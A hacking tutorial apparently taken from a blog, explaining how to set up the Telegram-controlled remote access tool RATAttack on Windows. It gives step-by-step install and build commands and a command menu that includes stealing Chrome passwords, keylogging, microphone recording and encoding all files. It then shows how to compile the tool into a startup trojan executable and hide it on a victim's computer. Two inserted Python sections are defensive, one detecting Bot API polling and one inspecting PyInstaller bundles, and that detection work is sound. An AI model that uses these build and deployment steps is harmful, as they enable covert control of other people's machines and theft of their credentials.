USE TELEGRAM TO HACK AND CONTROL YOUR WINDOWS 10 MACHINE

In this era of bots, almost everywhere you chat or submit a query in a web application, a bot is answering. A bot is a program that acts on your commands on your behalf. Many companies now use bots to provide online chat support to their customers: you say “hi” on chat support and you get “hello, how may I help you” in reply. This is a great step forward for companies and organizations, and it helps them a lot in automatically resolving their clients’ issues. But what about hackers? Don’t they take advantage of bots for their own selfish use? In this article we show how Telegram can be used to hack into a computer and how a Telegram bot can be used to control it.

There are many Remote Administration Tools (RATs) available in the market, but they commonly pose two problems:

  • The first problem is that if you take control of a computer hundreds of miles away through some trojan or malware, then in order to have some fun with that machine or to control it, you have to configure a Command and Control (C&C) server so that the C&C server gives the required commands to the victim machine.
  • The second problem is that the communication between the victim machine and the C&C server is not encrypted, which makes the communication insecure.

To overcome these problems, some researchers use Telegram bots as a Remote Administration Tool, which addresses both problems as follows:

  • To control the victim’s computer, you don’t need to do any port forwarding or host any server, because the Telegram bot takes care of this. The Telegram Bot API connects the victim’s computer to the Telegram server, through which the attacker can easily communicate with the victim.
  • The whole communication is encrypted through the HTTPS protocol, which helps to prevent any Man-In-The-Middle attack.
  • Best of all, the attacker can use the Telegram app on his/her mobile phone to control the victim machine or bot.
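
Seen from the network, the properties listed above leave one stable artifact: the controlled machine must itself open HTTPS sessions to the Bot API host, api.telegram.org, and HTTPS hides the content but not the destination or the process that made the connection. The sketch below is an added detection example, not part of the tool or the original article; the pipe-delimited telemetry format, the allow-list and the thresholds are assumptions, and the sample events are constructed.

```python
import statistics
from collections import defaultdict
from datetime import datetime

BOT_API_HOST = "api.telegram.org"  # host name of the Telegram Bot API

# Assumption: process images expected to reach Telegram in this environment.
# Matching on file name alone is spoofable; use full path or signer in production.
ALLOWED_IMAGES = {"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Constructed telemetry (hypothetical format): timestamp|host|process image|destination
SAMPLE_EVENTS = r"""
2020-04-20T10:00:00|WS-014|C:\Users\a\AppData\Roaming\RATAttack.exe|api.telegram.org
2020-04-20T10:00:20|WS-020|C:\Users\b\AppData\Roaming\Telegram Desktop\Telegram.exe|api.telegram.org
2020-04-20T10:01:00|WS-014|C:\Users\a\AppData\Roaming\RATAttack.exe|api.telegram.org
2020-04-20T10:01:30|WS-031|C:\Python37\python.exe|API.TELEGRAM.ORG.
2020-04-20T10:02:01|WS-014|C:\Users\a\AppData\Roaming\RATAttack.exe|api.telegram.org
2020-04-20T10:02:10|WS-014|C:\Program Files\Google\Chrome\Application\chrome.exe|www.example.com
2020-04-20T10:03:00|WS-014|C:\Users\a\AppData\Roaming\RATAttack.exe|api.telegram.org
2020-04-20T10:04:00|WS-014|C:\Users\a\AppData\Roaming\RATAttack.exe|api.telegram.org
2020-04-20T10:09:45|WS-031|C:\Python37\python.exe|api.telegram.org
"""


def parse(lines):
    """Yield (timestamp, host, image, destination) from pipe-delimited records."""
    for line in lines.strip().splitlines():
        parts = line.split("|")
        if len(parts) != 4:
            continue  # skip malformed records instead of failing the whole run
        ts, host, image, dest = parts
        # Normalise case and the trailing dot of a fully qualified name.
        yield datetime.fromisoformat(ts), host, image, dest.strip().lower().rstrip(".")


def find_bot_api_clients(lines, allowed=ALLOWED_IMAGES, min_hits=4, max_jitter=0.2):
    """Report non-allow-listed processes that contact the Bot API host.

    'periodic' is True when at least min_hits connections arrive at a near
    constant interval (coefficient of variation <= max_jitter), which is what
    a polling bot client looks like compared with a person using a browser.
    """
    seen = defaultdict(list)
    for ts, host, image, dest in parse(lines):
        if dest != BOT_API_HOST:
            continue
        exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in allowed:
            continue
        seen[(host, image)].append(ts)

    findings = []
    for (host, image), stamps in sorted(seen.items()):
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean_gap = statistics.mean(gaps) if gaps else None
        periodic = False
        if len(stamps) >= min_hits and mean_gap:
            periodic = statistics.pstdev(gaps) / mean_gap <= max_jitter
        findings.append({"host": host, "image": image, "hits": len(stamps),
                         "mean_gap_s": mean_gap, "periodic": periodic})
    return findings


if __name__ == "__main__":
    for finding in find_bot_api_clients(SAMPLE_EVENTS):
        print(finding)
```

Any hit from a process outside the allow-list deserves a look on a network where bots are not part of normal operations; the periodic flag only raises its priority.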

So let’s dive into the tool and see how it works:

ENVIRONMENT SETTINGS:

  • We strictly recommend that you use Python 3.7. Versions above or below 3.7 are not supported.
  • OS: Windows 7, 8 and 10 (Windows 10 recommended). No other operating system is supported.
  • Only the 64-bit Windows architecture is supported.
  • Make sure you have a good internet connection.

INSTALLATION STEPS:

CREATE YOUR OWN TELEGRAM BOT

  • To create the Telegram bot, download the official Telegram app from the Google Play store.
  • After downloading, navigate to the search bar of the Telegram app and type BotFather.
  • After the BotFather window is opened, click start and type /newbot.
  • It will then ask you to choose a name for your bot. For instance, let us take the name test123.
  • It will now ask you to choose a username for your bot; here we will choose the username rsu890_bot.
  • After performing all the above steps, it will allot you a token ID which looks something like 'xx:xx'. Copy this token ID and save it in a protected place, as we will be using this token ID to configure the bot.

INSTALLATION AND USAGE OF THE TOOL

  • Now paste the token ID of your bot at the first place your search takes you, i.e. change token = 'xx:xx' to token = 'YOUR_TOKEN_ID'.
  • Press Find Next and replace 'RVT_TOKEN' with 'YOUR_TOKEN_ID', so that token = os.environ['RVT_TOKEN'] becomes token = os.environ['YOUR_TOKEN_ID'], and save the file.
  • Now download the two Python libraries PyAudio and PyHook from the link given below:

https://www.lfd.uci.edu/~gohlke/pythonlibs/

  • Download pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl and pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl.
  • After downloading the above two libraries, install them by opening a command prompt and typing the commands pip install pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl and pip install pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl.
  • After downloading the above two libraries, copy the path of the downloaded repository, open the command prompt and type cd <path_of_repository>.
  • Now type the command pip install -r requirements.txt.
C:\Users\webimprints\rsu>cd C:\Users\webimprints\rsu\RAT-via-Telegram-master
C:\Users\webimprints\rsu\RAT-via-Telegram-master>pip install -r requirements.txt
  • Now your tool is ready to go; you can use it by typing the command python RATAttack.py.
  • Now you can open the Telegram app on your mobile phone, search for your bot username (for example rsu890_bot) and type the command /help in the chat box.

It will show you the following commands :

arp - display arp table
capture_pc - screenshot PC
cmd_exec - execute shell command
cp - copy files
cd - change current directory
delete - delete a file/folder
download - download file from target
decode_all - decode ALL encoded local files
dns - display DNS Cache
encode_all - encode ALL local files
freeze_keyboard - enable keyboard freeze
unfreeze_keyboard - disable keyboard freeze
get_chrome - Get Google Chrome's login/passwords
hear - record microphone
ip_info - via ipinfo.io
keylogs - get keylogs
ls - list contents of current or specified directory
msg_box - display message box with text
mv - move files
pc_info - PC information
ping - makes sure target is up
play - plays a youtube video
proxy - opens a proxy server
pwd - show current directory
python_exec - interpret python
reboot - reboot computer
run - run a file
schedule - schedule a command to run at specific time
self_destruct - destroy all traces
shutdown - shutdown computer
tasklist - display services and processes running
to - select targets by it's name
update - update executable
wallpaper - change wallpaper

NOW LET’S HAVE SOME FUN WITH THE TARGETED MACHINE :

  • Search for your bot in the Telegram app and type /pc_info to get information about the victim’s machine.
  • You can see and alter the Windows files of the victim’s system by typing the command /cd C:\Windows\system32
  • You can see the DNS records of the victim’s machine by typing /dns.
  • If you want the target machine to communicate with you only, replace the CHAT_ID in RATAttack.py.
  • Similarly, you can play a YouTube video by giving the command /play <VIDEO_ID>
  • You can shut down or restart the victim’s computer with /shutdown or /restart respectively.

You can do many more tasks by reading the /help manual!

USING THE TOOL AS A TROJAN :

Yes, we can use this tool as a trojan. As we all know, the easiest path to deliver malware to someone’s computer is to pack the malware into an .exe and send it to the victim. Here we will do the same thing by creating an .exe which will always run at startup. To make the .exe file, follow these steps:

  • Open compile.py in the downloaded folder with Notepad.
  • Comment out the statements download_and_install_lfd_uci_wheel('pyAudio') and download_and_install_lfd_uci_wheel('pyHook') so that they read #download_and_install_lfd_uci_wheel('pyAudio') and #download_and_install_lfd_uci_wheel('pyHook') respectively, and save the file.
  • Now open the terminal again and move to the RATAttack folder by typing the command cd <path_of_RATAttack>.
  • Now run the command python compile.py to build the .exe file.
C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master>python compile.py
Now going to install dependencies and compile the rat, make sure you have prepped RATAttack.py beforehand
Press ENTER to resume
'upx' is not recognized as an internal or external command,
operable program or batch file.
Did the install run correctly?
Press ENTER to build
139 INFO: PyInstaller: 3.6
143 INFO: Python: 3.7.4
143 INFO: Platform: Windows-10-10.0.18362-SP0
143 INFO: wrote C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\RATAttack.spec
146 INFO: UPX is not available.
146 INFO: Removing temporary files and cleaning cache in C:\Users\webimprints\rsu\AppData\Roaming\pyinstaller
178 INFO: Extending PYTHONPATH with paths
['C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master',
'C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master']
182 INFO: checking Analysis
182 INFO: Building Analysis because Analysis-00.toc is non existent
182 INFO: Initializing module dependency graph…
189 INFO: Caching module graph hooks…
209 INFO: Analyzing base_library.zip …
8635 INFO: Caching module dependency graph…
8807 INFO: running Analysis Analysis-00.toc
8823 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable
required by c:\users\webimprints\rsu\appdata\local\programs\python\python37\python.exe
8965 INFO: Analyzing C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\RATAttack.py
11708 INFO: Processing pre-find module path hook distutils
11708 INFO: distutils: retargeting to non-venv dir 'c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib'
14101 INFO: Processing pre-find module path hook site
14105 INFO: site: retargeting to fake-dir 'c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages\PyInstaller\fake-modules'
17175 INFO: Processing pre-safe import module hook setuptools.extern.six.moves
24228 INFO: Processing pre-safe import module hook win32com
26225 INFO: Processing pre-safe import module hook urllib3.packages.six.moves
29213 INFO: Processing module hooks…
29213 INFO: Loading module hook "hook-certifi.py"…
29213 INFO: Loading module hook "hook-cv2.py"…
29213 INFO: Loading module hook "hook-distutils.py"…
29228 INFO: Loading module hook "hook-encodings.py"…
29369 INFO: Loading module hook "hook-lib2to3.py"…
29384 INFO: Loading module hook "hook-numpy.core.py"…
29900 INFO: Loading module hook "hook-numpy.py"…
29900 INFO: Loading module hook "hook-PIL.Image.py"…
31044 INFO: Loading module hook "hook-PIL.py"…
31047 INFO: Import to be excluded not found: 'FixTk'
31051 INFO: Import to be excluded not found: 'PyQt4'
31051 INFO: Import to be excluded not found: 'PySide'
31051 INFO: Excluding import 'PyQt5'
31055 INFO: Removing import of PyQt5 from module PIL.ImageQt
31059 INFO: Excluding import 'tkinter'
31063 INFO: Removing import of tkinter from module PIL.ImageTk
31067 INFO: Loading module hook "hook-PIL.SpiderImagePlugin.py"…
31071 INFO: Import to be excluded not found: 'FixTk'
31074 INFO: Excluding import 'tkinter'
31083 INFO: Loading module hook "hook-pkg_resources.py"…
32079 INFO: Excluding import 'main'
32083 INFO: Removing import of main from module pkg_resources
32083 INFO: Loading module hook "hook-pydoc.py"…
32086 INFO: Loading module hook "hook-pythoncom.py"…
32454 INFO: Loading module hook "hook-pywintypes.py"…
32817 INFO: Loading module hook "hook-setuptools.py"…
33720 INFO: Loading module hook "hook-sqlite3.py"…
33861 INFO: Loading module hook "hook-sysconfig.py"…
33861 INFO: Loading module hook "hook-win32com.py"…
34049 INFO: Loading module hook "hook-xml.dom.domreg.py"…
34049 INFO: Loading module hook "hook-xml.etree.cElementTree.py"…
34049 INFO: Loading module hook "hook-xml.py"…
34049 INFO: Loading module hook "hook-_tkinter.py"…
34377 INFO: checking Tree
34377 INFO: Building Tree because Tree-00.toc is non existent
34377 INFO: Building Tree Tree-00.toc
34517 INFO: checking Tree
34517 INFO: Building Tree because Tree-01.toc is non existent
34517 INFO: Building Tree Tree-01.toc
34673 INFO: Looking for ctypes DLLs
34829 INFO: Analyzing run-time hooks …
34845 INFO: Including run-time hook 'pyi_rth_pkgres.py'
34845 INFO: Including run-time hook 'pyi_rth_win32comgenpy.py'
34861 INFO: Including run-time hook 'pyi_rth_multiprocessing.py'
34877 INFO: Including run-time hook 'pyi_rth_certifi.py'
34907 INFO: Looking for dynamic libraries
37430 INFO: Looking for eggs
37430 INFO: Using Python library c:\users\webimprints\rsu\appdata\local\programs\python\python37\python37.dll
37445 INFO: Found binding redirects:
[]
37461 INFO: Warnings written to C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\warn-RATAttack.txt
37804 INFO: Graph cross-reference written to C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\xref-RATAttack.html
37867 INFO: checking PYZ
37867 INFO: Building PYZ because PYZ-00.toc is non existent
37867 INFO: Building PYZ (ZlibArchive) C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\PYZ-00.pyz
40633 INFO: Building PYZ (ZlibArchive) C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\PYZ-00.pyz completed successfully.
40712 INFO: checking PKG
40712 INFO: Building PKG because PKG-00.toc is non existent
40712 INFO: Building PKG (CArchive) PKG-00.pkg
60100 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
441806 INFO: Bootloader c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages\PyInstaller\bootloader\Windows-64bit\run.exe
441806 INFO: checking EXE
441822 INFO: Building EXE because EXE-00.toc is non existent
441837 INFO: Building EXE from EXE-00.toc
441837 INFO: Appending archive to EXE C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\dist\RATAttack.exe
442041 INFO: Building EXE from EXE-00.toc completed successfully.
Script has finished
C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master>cd C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master
  • As you can see, the compilation is successful. Your .exe file is now built; you can find it by going into \dist, and you can run it in the same way as you ran the tool in the steps above.
  • If you have access to the victim’s computer for a while, you can hide this .exe file and keep it running in the background, or you can bind this .exe file and do some scripting to hide it in the victim’s computer.
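
For triage, the build log above shows what ends up on disk: a PyInstaller bootloader with a CArchive appended ("Appending archive to EXE"), linked against python37.dll. The following added example (not from the original article or the tool) checks whether a file carries such an archive by locating the trailing CArchive cookie; the cookie layout is assumed from PyInstaller's CArchive format and should be verified against the version in question, and the sample bytes are constructed.

```python
import struct

# Magic bytes that open the CArchive cookie (assumed from PyInstaller's format).
MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Cookie layout: magic, package length, TOC offset, TOC length,
# Python version, Python library name (NUL padded), all big-endian.
COOKIE = struct.Struct("!8sIIII64s")


def inspect_pyinstaller(data, tail=65536):
    """Return cookie details if `data` carries a PyInstaller CArchive, else None.

    Only the last `tail` bytes are searched: the cookie closes the archive,
    but a signature or other data appended afterwards can follow it.
    """
    pos = data.rfind(MAGIC, max(0, len(data) - tail))
    if pos < 0 or pos + COOKIE.size > len(data):
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = COOKIE.unpack_from(data, pos)
    archive_start = pos + COOKIE.size - pkg_len
    # Reject chance matches of the magic: the lengths must be self-consistent.
    if pkg_len < COOKIE.size or archive_start < 0:
        return None
    if toc_off + toc_len > pkg_len - COOKIE.size:
        return None
    # Version is stored as e.g. 37 (3.7); three-digit values such as 310 mean 3.10.
    major, minor = divmod(pyver, 100 if pyver >= 100 else 10)
    return {
        "archive_offset": archive_start,           # where the bootloader stub ends
        "archive_size": pkg_len,
        "python": "%d.%d" % (major, minor),
        "pylib": pylib.rstrip(b"\x00").decode("ascii", "replace"),
        "trailing_bytes": len(data) - (pos + COOKIE.size),
    }


def inspect_file(path, tail=65536):
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as handle:
        return inspect_pyinstaller(handle.read(), tail)


def build_sample():
    """Constructed stand-in for a bundled executable (not a real binary)."""
    stub = b"MZ" + b"\x00" * 62                    # 64-byte fake bootloader
    body, toc = b"compressed-modules", b"\x00" * 16
    pkg_len = len(body) + len(toc) + COOKIE.size
    cookie = COOKIE.pack(MAGIC, pkg_len, len(body), len(toc), 37, b"python37.dll")
    return stub + body + toc + cookie


if __name__ == "__main__":
    print(inspect_pyinstaller(build_sample()))
```

A positive result only says the file is a PyInstaller bundle, which plenty of legitimate software is; it becomes interesting when combined with an unexpected location, a missing signature or a startup entry.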

CONCLUSION :

The whole tool is written in Python, which provides many of the functions in the tool. The concept behind this tool is much better than that of any other malware, and it helps the attacker to communicate easily with the victim’s system with less technical knowledge required.